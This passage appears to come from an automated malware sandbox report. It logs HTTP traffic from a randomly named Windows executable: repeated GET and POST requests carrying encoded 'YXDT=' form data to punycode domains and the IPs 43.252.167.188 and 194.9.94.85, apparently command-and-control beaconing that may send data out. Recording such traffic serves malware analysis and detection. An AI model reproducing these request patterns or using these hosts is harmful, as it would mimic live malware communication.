                    Data Ascii: YXDT=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC0WfxQAAnsaTmeQ2koMEcJ8bC8/DgVs8CwXxLiF2a67btff94AVeSPdECv5plAaBpjI/vrYg/I5O31cRE9f6Yk5bMzQr+IJ7XTN1mJP23paNeph/StAfYCT5HYm25YoGvxpv0tNdtQCrCU9ba1UlyVr64GbI9XHLizt0pVuotL56dcfbRt22sqIkMd51A2wm8EW0SiiNi/QpdtY8XMVE1bwp7GBEL34NQvDeP+UeWn40D/J+yz9oKTMOHMojIE7gwrHQZC3z5phGWjMLqThzYqL4v4hWgBu6MjSrEJ93kGXnxZZ/8fLsyOzpylVY3PZIUFSaXUVMcV9EWisug167GRuBhd63iiG6kUHBGOf8/JSyacK9Whc1aNpDrXFakxg9DsUvjaG2s/DEfgYJLfZTPCoQd5ijEaof0171coCztoVSuQ1msEF+FnhNF7wDIN3+iGk+A3L+18f43ePXdQX+NdciT1g4CDSd14ipxbT1jV1Sm1QFpIXhz1QNtPUQkzRhQDEY2x6RwibrEMn2OQ+LkRrmGCLz5C+DuDpNaonW0MM8DSq1BwhJjeIfs6YbP+366NXxUcl85SJr0sEeKbSwvjzMO+QYy3o9Y4InICSg72javScEAe9yBUfT0HIT32wHcrM6TbOWuMYuib1J61Lxthy37BW2Wa0DJF4j/X1pEK/6Fy09gY7InTaFUn7AeXXXnrzWAt6HNOoYwjEBJ705hAXx1zxI0jQQaLhLFYmeTQQWj1Fc53eNhCnHqD7KGNNWPGNfeHFDCTvaUzaYzbiHbmiWxXImU1bkqsAKvsrHHQjUVqP41wEFaeyhVVotORkpSzlq1l [TRUNCATED]
                    Aug 12, 2024 05:14:46.413259029 CEST367INHTTP/1.1 404 Not Found
                    Date: Mon, 12 Aug 2024 03:22:09 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.44975143.252.167.188802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:47.839350939 CEST508OUTGET /rm91/?ZH3=yf1H3v6h&YXDT=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.xn--fhq1c541j0zr.com
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Aug 12, 2024 05:14:48.710083961 CEST367INHTTP/1.1 404 Not Found
                    Date: Mon, 12 Aug 2024 03:22:12 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.449752194.9.94.85802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:53.818006992 CEST792OUTPOST /4hda/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.xn--matfrmn-jxa4m.se
                    Origin: http://www.xn--matfrmn-jxa4m.se
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 201
                    Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 63 6e 30 59 73 41 46 43 66 32 35 4c 4b 39 55 74 59 5a 59 74 67 75 41 72 58 62 55 38 47 34 48 63 77 3d 3d
                    Data Ascii: YXDT=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2Xcn0YsAFCf25LK9UtYZYtguArXbU8G4Hcw==
                    Aug 12, 2024 05:14:54.455980062 CEST1236INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Mon, 12 Aug 2024 03:14:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Powered-By: PHP/8.1.29
                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                    Aug 12, 2024 05:14:54.456032038 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                    Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                    Aug 12, 2024 05:14:54.456065893 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                    Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                    Aug 12, 2024 05:14:54.456108093 CEST672INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                    Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                    Aug 12, 2024 05:14:54.456140995 CEST1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                    Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                    Aug 12, 2024 05:14:54.456176043 CEST206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                    Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.449753194.9.94.85802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:56.359544992 CEST812OUTPOST /4hda/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.xn--matfrmn-jxa4m.se
                    Origin: http://www.xn--matfrmn-jxa4m.se
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 221
                    Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4b 7a 32 51 53 67 78 46 46 4f 48 30 77 34 4f 52 4a 79 4d 44 38 49 34 71 37 44 79 2f 52 71 70 6e 34 3d
                    Data Ascii: YXDT=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gKz2QSgxFFOH0w4ORJyMD8I4q7Dy/Rqpn4=
                    Aug 12, 2024 05:14:56.999478102 CEST1236INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Mon, 12 Aug 2024 03:14:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Powered-By: PHP/8.1.29
                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                    Aug 12, 2024 05:14:56.999519110 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                    Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                    Aug 12, 2024 05:14:56.999552011 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                    Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                    Aug 12, 2024 05:14:56.999583006 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                    Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                    Aug 12, 2024 05:14:56.999618053 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                    Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.449754194.9.94.85802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:58.900903940 CEST10894OUTPOST /4hda/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.xn--matfrmn-jxa4m.se
                    Origin: http://www.xn--matfrmn-jxa4m.se
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 10301
                    Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 36 6c 57 39 73 52 6a 4e 49 4f 73 67 47 4b 31 52 32 52 39 32 56 54 66 30 78 45 44 7a 68 53 64 32 63 46 79 72 65 6f 72 38 4e 62 37 79 50 6d 65 6d 33 2f 67 39 6b 52 5a 36 38 36 4f 59 64 4e 42 77 5a 6d 79 6a 35 78 33 51 2b 79 77 30 51 6e 6d 66 64 70 46 41 75 46 70 58 42 32 45 51 31 78 62 59 72 31 66 59 2b 45 6b 45 46 66 33 51 54 58 69 70 4b 35 69 6b 2f 52 74 4a 49 66 58 53 2b 76 64 53 32 52 6b 75 64 67 6f 30 6c 6e 6a 6b 6c 67 7a 43 32 6e 32 49 4b 30 5a 32 46 62 6e 75 5a 49 6b 68 77 77 2f [TRUNCATED]
                    Data Ascii: YXDT=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNv6lW9sRjNIOsgGK1R2R92VTf0xEDzhSd2cFyreor8Nb7yPmem3/g9kRZ686OYdNBwZmyj5x3Q+yw0QnmfdpFAuFpXB2EQ1xbYr1fY+EkEFf3QTXipK5ik/RtJIfXS+vdS2Rkudgo0lnjklgzC2n2IK0Z2FbnuZIkhww/nkWim2hmqaT2OphONFeQMYrNBQ1VrkZqo5Fe+PIblPuXmZOwytYQ6Uzw2YGRa/rzQ+dYkLieKKzvIDTPNaHI4sLbLzerzUNaC0/MVLZT37ySpk5CXopLFmdJfVhRcwa4qnf3Z6XHe1RCxMgt+O2tzA/SU7bYvVWcJwysssdO9TPcuF+murPDQHN0WpQdiiJjNew1/U7+BqVoEXIhYW83o/ZXFh9UcKO3+MYz+199jGUI+2blszQQQqrHxvao5WCZNsaGcqOAYVbgQWlTOpTAtp5yMbe29opIqDFrLL0sQLelAjXBT2Cy7EQP2ELzdMPouQkwvUufwxyOTtHhqfqp9MFXVTJc7N0c2123UN7gN8ZctWHe1nIqZN6OTm6yw9UDiknTs8Edr/Zp69waFmdsZIKYSvqNY60QLu4zOXeD9eCtTRa/2DrQ9DBilsmrNaF5rf/0jUcFYokV5aQtfoAX1ROpqBSCH4d3SemCk3f/HHb77DqCufk35+CnN0K/7B4t8cTKAlFTUlFarlhLHYXKb/jWluD/IzP++JQL1qnziFXnhG1jiYS8pRwSEcmF/R4A5IMYKSCSwFXEjRN6uHopYIaXiopH1GgvaF0kx8a5D2ypsRvcFtUvBAAlv62+6uXWdW0eHXhBVRyuISs0NkBNwQ37x5v0LLr25X [TRUNCATED]
                    Aug 12, 2024 05:14:59.550528049 CEST1236INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Mon, 12 Aug 2024 03:14:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Powered-By: PHP/8.1.29
                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
